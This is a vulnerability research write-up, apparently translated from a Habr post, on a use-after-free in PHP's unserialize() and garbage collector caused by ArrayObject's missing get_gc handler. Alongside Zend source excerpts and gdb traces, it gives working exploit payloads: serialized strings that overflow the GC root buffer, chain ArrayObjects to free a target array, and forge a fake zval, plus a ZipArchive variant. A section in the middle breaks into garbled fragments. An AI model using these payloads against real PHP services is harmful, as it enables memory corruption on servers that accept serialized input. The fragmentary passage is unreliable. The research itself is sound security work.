$serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:0;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}';
$outer_array = unserialize($serialized_string);
gc_collect_cycles();
$filler1 = "aaaa";
$filler2 = "bbbb";
var_dump($outer_array);
// Result:
// string(4) "bbbb"

One would expect output like this instead:

array(1) { // outer_array
  [1]=>
  object(ArrayObject)#1 (1) {
    ["storage":"ArrayObject":private]=>
    array(2) { // inner_array
      [1]=>
      // reference to inner_array
      [2]=>
      // reference to outer_array
    }
  }
}
As the result shows, the outer array ($outer_array) is released, and its zval is overwritten by the zval of $filler2. As a result, we get bbbb. The following questions arise. What does gc_collect_cycles() do, and is it really necessary to call it manually? That would be very inconvenient for remote exploitation, because many scripts and installations never call this function at all.

The behavior is tied to the gc_collect_cycles function, which calls the PHP garbage collector. We need to understand the collector better to make sense of this mysterious example.

The garbage collector is switched on and off by the zend.enable_gc setting in php.ini.

A circular reference is the classic case it has to handle:

$test = array();
$test[0] = &$test;
unset($test);
Since $test refers to itself, its reference count is 2. Even after unset($test) brings the count down to 1, the memory is not released: a leak occurs. To solve this problem, the PHP developers implemented a garbage collection algorithm based on the IBM paper "Concurrent Cycle Collection in Reference Counted Systems".

Candidate zvals for cyclic garbage are registered through gc_zval_possible_root. Any such potential zval is called a root and is added to the gc_root_buffer list.

When the root buffer is full, gc_zval_possible_root itself calls gc_collect_cycles to process and clear the current buffer so that new items can be stored.

The core of gc_collect_cycles:

"Zend/zend_gc.c"
[...]
ZEND_API int gc_collect_cycles(TSRMLS_D)
{
[...]
        gc_mark_roots(TSRMLS_C);
        gc_scan_roots(TSRMLS_C);
        gc_collect_roots(TSRMLS_C);
[...]
        /* Free zvals */
        p = GC_G(free_list);
        while (p != FREE_LIST_END) {
            q = p->u.next;
            FREE_ZVAL_EX(&p->z);
            p = q;
        }
[...]
}
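The self-referencing array described earlier can be used to watch the collector work from userland. The following is a minimal sketch, assuming a PHP build with the cycle collector available; the variable name $collected is only illustrative, and the exact count returned may differ between PHP versions.

```php
<?php
gc_enable();                       // make sure the cycle collector is active
gc_collect_cycles();               // start from an empty root buffer

$test = array();
$test[0] = &$test;                 // the array now holds a reference to itself
unset($test);                      // the name is gone, but the cycle keeps the data alive

$collected = gc_collect_cycles();  // run the collector by hand
var_dump($collected);              // number of collected cycles reported by PHP
```

Without the explicit call, the cycle would stay in memory until the root buffer fills up or the request ends.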
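gc_mark_roots(TSRMLS_C): applies zval_mark_grey to all purple elements in gc_root_buffer. For the current zval, zval_mark_grey does the following: it returns if the zval is already marked grey; otherwise it marks the zval grey, retrieves its child zvals, decrements their reference counters, and then calls zval_mark_grey on each of them.

gc_scan_roots(TSRMLS_C): zvals whose counter is still above zero are marked black again; zvals whose counter has dropped to zero are marked white.

gc_collect_roots(TSRMLS_C): the reference counters of all white zvals are restored. They are also added to the gc_zval_to_free list, which is equivalent to the gc_free_list list.

Finally, all gc_free_list elements, i.e. those marked white, are released.

Note that zval_mark_grey decrements the counters of all child zvals before checking whether they are already marked grey.

Back to our example:

$serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:0;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}';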
The following gdb macro dumps the contents of the GC root buffer:

define dumpgc
    set $current = gc_globals.roots.next
    printf "GC buffer content:\n"
    while $current != &gc_globals.roots
        printzv $current.u.pz
        set $current = $current.next
    end
end

Set breakpoints on gc_mark_roots and gc_scan_roots to see the state of all relevant reference counters.

(gdb) r poc1.php
[...]
Breakpoint 1, gc_mark_roots () at [...]
(gdb) dumpgc
GC roots buffer content:
[0x109f4b0] (refcount=2) array(1): { // outer_array
    1 => [0x109d5c0] (refcount=1) object(ArrayObject) #1
}
[0x109ea20] (refcount=2,is_ref) array(2): { // inner_array
    1 => [0x109ea20] (refcount=2,is_ref) array(2): // reference to inner_array
    2 => [0x109f4b0] (refcount=2) array(1): // reference to outer_array
}

At the gc_scan_roots breakpoint, we get the following states of the reference counters:

(gdb) c
[...]
Breakpoint 2, gc_scan_roots () at [...]
(gdb) dumpgc
GC roots buffer content:
[0x109f4b0] (refcount=0) array(1): { // outer_array
    1 => [0x109d5c0] (refcount=0) object(ArrayObject) #1
}
gc_mark_roots really did decrement all counters to zero. These nodes can therefore be marked white in the following steps and later released. But the question arises: why were the counters zeroed in the first place?

Let's step through gc_mark_roots and zval_mark_grey to understand what is happening.

1. zval_mark_grey is applied to outer_array (remember that outer_array was added to the garbage collection buffer).
2. outer_array is marked grey, and all its descendants are retrieved. In our case, outer_array has only one descendant: "object(ArrayObject) #1" (refcount = 1).
3. The counter of this descendant, the ArrayObject, is decremented: "object(ArrayObject) #1" (refcount = 0).
4. zval_mark_grey is applied to the ArrayObject.
5. The ArrayObject is marked grey, and its descendants are retrieved: references to inner_array and outer_array.
6. The counters of both descendants are decremented: outer_array (refcount = 1), inner_array (refcount = 1).
7. zval_mark_grey is applied to outer_array without any effect, because outer_array is already grey (it was processed at the second stage).
8. zval_mark_grey is applied to inner_array. It is marked grey, and all its children are retrieved. The children are the same as at the fifth stage.
9. The counters of both children are decremented again: outer_array (refcount = 0), inner_array (refcount = 0).
10. No zvals remain to be visited, so zval_mark_grey terminates.

As a result, the references held in inner_array (or, equivalently, in the ArrayObject) are decremented twice! This is definitely unexpected behavior, because each reference must be decremented exactly once. In particular, the eighth stage should not happen at all, because all elements were already processed and marked earlier, at the sixth stage.

The relevant part of zval_mark_grey:

"Zend/zend_gc.c"
[...]
static void zval_mark_grey(zval *pz TSRMLS_DC)
{
[...]
    if (Z_TYPE_P(pz) == IS_OBJECT && EG(objects_store).object_buckets) {
        if (EXPECTED(EG(objects_store).object_buckets[Z_OBJ_HANDLE_P(pz)].valid &&
                     (get_gc = Z_OBJ_HANDLER_P(pz, get_gc)) != NULL)) {
[...]
            HashTable *props = get_gc(pz, &table, &n TSRMLS_CC);
[...]
}
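The double decrement in the stages above can be reproduced with a toy model. This is only a sketch under stated assumptions: the Node class and the mark_grey and simulate functions are hypothetical and are not Zend code, the starting reference counts are taken from the gdb dump, and the traversal is simplified to "decrement the child, then recurse". The buggy case hands the collector inner_array's child list as the children of the ArrayObject, so inner_array itself is never marked grey on that path.

```php
<?php
// Toy model of the marking phase; hypothetical names, not the Zend implementation.
class Node
{
    public $name;
    public $refcount;
    public $color = 'black';
    public $children = array();   // what the collector is told this node references

    public function __construct($name, $refcount)
    {
        $this->name = $name;
        $this->refcount = $refcount;
    }
}

function mark_grey(Node $node)
{
    if ($node->color === 'grey') {
        return;                   // already visited
    }
    $node->color = 'grey';
    foreach ($node->children as $child) {
        $child->refcount--;       // decremented BEFORE the grey check of the child
        mark_grey($child);
    }
}

function simulate($buggy)
{
    $outer  = new Node('outer_array', 2);
    $object = new Node('ArrayObject', 1);
    $inner  = new Node('inner_array', 2);

    $outer->children = array($object);
    $inner->children = array($inner, $outer);
    // Buggy: the object exposes inner_array's hash table as its own children.
    // Expected: the object exposes inner_array itself as its only child.
    $object->children = $buggy ? $inner->children : array($inner);

    mark_grey($outer);
    return array($outer->refcount, $object->refcount, $inner->refcount);
}

$buggy = simulate(true);
$fixed = simulate(false);
var_dump($buggy, $fixed);
```

In the buggy variant every counter ends at zero, which matches the second gdb dump; in the other variant outer_array keeps one reference and would survive the scan phase.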
For an object zval, zval_mark_grey calls the object's special get_gc handler. It must return a hash table with all descendants. After further debugging, I discovered that this leads to a call to spl_array_get_properties:

"ext/spl/spl_array.c"
[...]
static HashTable *spl_array_get_properties(zval *object TSRMLS_DC) /* {{{ */
{
[...]
    result = spl_array_get_hash_table(intern, 1 TSRMLS_CC);
[...]
    return result;
}
In short, the hash table of the ArrayObject's internal array is returned. The error is that this one hash table is used in two different contexts when the algorithm tries to access:

the descendants of the ArrayObject zval;
the descendants of inner_array.

Returning the inner_array hash table is almost the same as processing inner_array at the first stage, at which point it should be marked grey; inner_array should therefore not be processed again at the second stage!

So why is inner_array not marked grey at the first stage? Let's look again at how zval_mark_grey retrieves the descendants of the parent object:

HashTable *props = get_gc(pz, &table, &n TSRMLS_CC);

A get_gc handler typically looks like this one:

"ext/date/php_date.c"
[...]
static HashTable *date_object_get_gc(zval *object, zval ***table, int *n TSRMLS_DC)
{
    *table = NULL;
    *n = 0;
    return zend_std_get_properties(object TSRMLS_CC);
}
Besides the returned hash table, there is the table parameter, which is passed by reference and serves as a second "return parameter". This zval table must contain all the zvals that the object references in other contexts; for example, all objects/zvals stored in an SplObjectStorage.

For our ArrayObject we would expect the zval table to contain inner_array. Then why is spl_array_get_properties called instead of spl_array_get_gc?

The answer is that spl_array_get_gc does not exist! The PHP developers forgot to implement a garbage collection function for ArrayObjects. But this still does not explain why spl_array_get_properties is called. To find out, let's look at how objects are initialized in general:

"Zend/zend_object_handlers.c"
[...]
ZEND_API HashTable *zend_std_get_gc(zval *object, zval ***table, int *n TSRMLS_DC) /* {{{ */
{
    if (Z_OBJ_HANDLER_P(object, get_properties) != zend_std_get_properties) {
        *table = NULL;
        *n = 0;
        return Z_OBJ_HANDLER_P(object, get_properties)(object TSRMLS_CC);
[...]
}
The standard get_gc handler falls back to the get_properties method, the object's own method, if one is specified. This is the case for ArrayObjects.

But is it really necessary to call gc_collect_cycles manually?

define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000);
define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5);
$overflow_gc_buffer = str_repeat('i:0;a:0:{}', NUM_TRIGGER_GC_ELEMENTS);
$trigger_gc_serialized_string = 'a:'.(NUM_TRIGGER_GC_ELEMENTS).':{'.$overflow_gc_buffer.'}';
unserialize($trigger_gc_serialized_string);
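The string above stores every element under index 0. How unserialize treats a repeated index can be checked in isolation with a much smaller input. This is a minimal sketch; the three-element string and the variable names are illustrative and not part of the original payload.

```php
<?php
// Three key/value pairs, but every pair reuses index 0.
$serialized = 'a:3:{' . str_repeat('i:0;a:0:{}', 3) . '}';
$result = unserialize($serialized);

// Each later pair replaces the value stored under index 0,
// so the earlier values are destroyed along the way.
var_dump(count($result));
var_dump($result);
```

Scaled up past the size of the root buffer, the same replacement of old elements is what the larger string relies on.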
With this input, gc_collect_cycles is indeed called. This trick only works because deserialization allows the same index to be assigned many times (index 0 in this example). When an array index is reused, the reference count of the old element must be decremented. To do this, the deserialization process calls zend_hash_update, which calls the destructor of the old element.

Once enough of these elements have filled the root buffer, gc_collect_cycles will be called.

During deserialization, every element is additionally recorded in the var_hash list. When deserialization comes to an end, the records are destroyed using the var_destroy function.

$reference_count_test = unserialize('a:2:{i:0;i:1337;i:1;r:2;}');
debug_zval_dump($reference_count_test);
/* Result:
array(2) refcount(2){
  [0]=>
  long(1337) refcount(2)
  [1]=>
  long(1337) refcount(2)
}
*/
If we stop during deserialization (before the var_destroy call) and dump the contents of var_hash, we will see the following counter values:

[0x109e820] (refcount=2) array(2): {
    0 => [0x109cf70] (refcount=4) long: 1337
    1 => [0x109cf70] (refcount=4) long: 1337
}
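The serialized strings in this article lean on the two back-reference markers of the serialization format, r: and R:. The following is a minimal sketch of how they differ for a plain integer; the variable names are illustrative. Slot 1 is the array itself and slot 2 is its first element.

```php
<?php
// R:2 makes element 1 a PHP reference to slot 2 (element 0).
$by_ref = unserialize('a:2:{i:0;i:1337;i:1;R:2;}');
$by_ref[1] = 42;                 // also changes element 0

// r:2 reuses the value of slot 2 without binding the two elements together.
$by_val = unserialize('a:2:{i:0;i:1337;i:1;r:2;}');
$by_val[1] = 42;                 // element 0 keeps its value

var_dump($by_ref[0], $by_val[0]);
```

Because both markers can point at any slot that has already been deserialized, a payload can attach extra references to a chosen zval.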
The ArrayObject deserialization function takes a reference to another array for initialization. That is, when you deserialize an ArrayObject, you can simply refer to any array that has already been deserialized. This allows decrementing all records of a specific hash table twice. The sequence of actions is as follows:

1. There is a target zval X that is to be released.
2. Create an array Y holding several references to X: array(ref_to_X, ref_to_X, [...], ref_to_X)
3. Create an ArrayObject that will be initialized with the contents of the Y array. It will therefore return all descendants of the Y array when processed by the garbage collector's marking algorithm.
4. Create another ArrayObject with the same settings as the previous one.
5. When the marking algorithm reaches the second ArrayObject, it starts decrementing all references in the Y array for the third time. Now we can get a negative reference counter delta and zero the counter of any target zval!

Since these ArrayObject instances are used for decrementing counters, I will now call them DecrementorObject.
[...] gc_mark_roots [...] zval_mark_grey [...] zval [...] 0.

[...] gc_scan_roots [...] zval [...] (0).

[...] DecrementorObject [...] 0 [...] zval [...] DecrementorObject [...]

[...] DecrementorObject [...] zval_mark_grey [...]:

array( ref_to_X, ref_to_X, DecrementorObject, DecrementorObject)
       -----              ------------------------------------
/*       |                                  |
    target_zval             each one is initialized with the
         X                       contents of array X        */

[...] DecrementorObject [...] gc_mark_roots [...] zval [...]:

define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000);
define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5);
// Overflow the GC root buffer.
$overflow_gc_buffer = str_repeat('i:0;a:0:{}', NUM_TRIGGER_GC_ELEMENTS);
// Each decrementor_object is initialized with the contents of the target array ($free_me).
$decrementor_object = 'C:11:"ArrayObject":19:{x:i:0;r:3;;m:a:0:{}}';
// These references point to the $free_me array (id=3).
$target_references = 'i:0;r:3;i:1;r:3;i:2;r:3;i:3;r:3;';
// The target array, i.e. the array that is supposed to be released.
$free_me = 'a:7:{'.$target_references.'i:9;'.$decrementor_object.'i:99;'.$decrementor_object.'i:999;'.$decrementor_object.'}';
// Raise the reference count of each decrementor_object by 2.
$adjust_rcs = 'i:99;a:3:{i:0;r:8;i:1;r:12;i:2;r:16;}';
// Trigger the garbage collector.
$trigger_gc = 'i:0;a:'.(2 + NUM_TRIGGER_GC_ELEMENTS).':{i:0;'.$free_me.$adjust_rcs.$overflow_gc_buffer.'}';
// Final payload: the GC trigger plus a reference to the target array.
$payload = 'a:2:{'.$trigger_gc.'i:0;r:3;}';
var_dump(unserialize($payload));
/* Result:
array(1) {
  [0]=>
  int(140531288870456)
}
*/
[...] gc_collect_roots [...]! [...] ($free_me) [...]

[...] var_destroy [...] zval [...]

define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000);
define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5);
// Fake zval, encoded as a string.
$fake_zval_string = pack("Q", 1337).pack("Q", 0).str_repeat("\x01", 8);
$encoded_string = str_replace("%", "\\", urlencode($fake_zval_string));
$fake_zval_string = 'S:'.strlen($fake_zval_string).':"'.$encoded_string.'";';
// Interleaved structure:
// TRIGGER_GC;FILL_FREED_SPACE;[...];TRIGGER_GC;FILL_FREED_SPACE
$overflow_gc_buffer = '';
for($i = 0; $i < NUM_TRIGGER_GC_ELEMENTS; $i++) {
    $overflow_gc_buffer .= 'i:0;a:0:{}';
    $overflow_gc_buffer .= 'i:'.$i.';'.$fake_zval_string;
}
// Each decrementor_object is initialized with the contents of the target array ($free_me).
$decrementor_object = 'C:11:"ArrayObject":19:{x:i:0;r:3;;m:a:0:{}}';
// These references point to the $free_me array (id=3).
$target_references = 'i:0;r:3;i:1;r:3;i:2;r:3;i:3;r:3;';
// The target array, i.e. the array that is supposed to be released.
$free_me = 'a:7:{i:9;'.$decrementor_object.'i:99;'.$decrementor_object.'i:999;'.$decrementor_object.$target_references.'}';
// Raise the reference count of each decrementor_object by 2.
$adjust_rcs = 'i:99999;a:3:{i:0;r:4;i:1;r:8;i:2;r:12;}';
// Trigger the garbage collector.
$trigger_gc = 'i:0;a:'.(2 + NUM_TRIGGER_GC_ELEMENTS*2).':{i:0;'.$free_me.$adjust_rcs.$overflow_gc_buffer.'}';
// Additional references (r:4) that stabilize the fake zval.
$stabilize_fake_zval_string = 'i:0;r:4;i:1;r:4;i:2;r:4;i:3;r:4;';
$payload = 'a:6:{'.$trigger_gc.$stabilize_fake_zval_string.'i:4;r:8;}';
$a = unserialize($payload);
var_dump($a);
/* Result:
array(5) {
  [...]
  [4]=>
  int(1337)
}
*/
A similar result can be obtained with ZipArchive, via php_zip_get_properties [...]:

$serialized_string = 'a:1:{i:0;a:3:{i:1;N;i:2;O:10:"ZipArchive":1:{s:8:"filename";i:1337;}i:1;R:5;}}';
$array = unserialize($serialized_string);
gc_collect_cycles();
$filler1 = "aaaa";
$filler2 = "bbbb";
var_dump($array[0]);
/* Result:
array(2) {
  [1]=>
  string(4) "bbbb"
[...]
*/

[...]
i:1;N;
[...]
s:8:"filename";i:1337;
[...]
i:1;R:REF_TO_FILENAME;
[...]
Source: https://habr.com/ru/post/308242/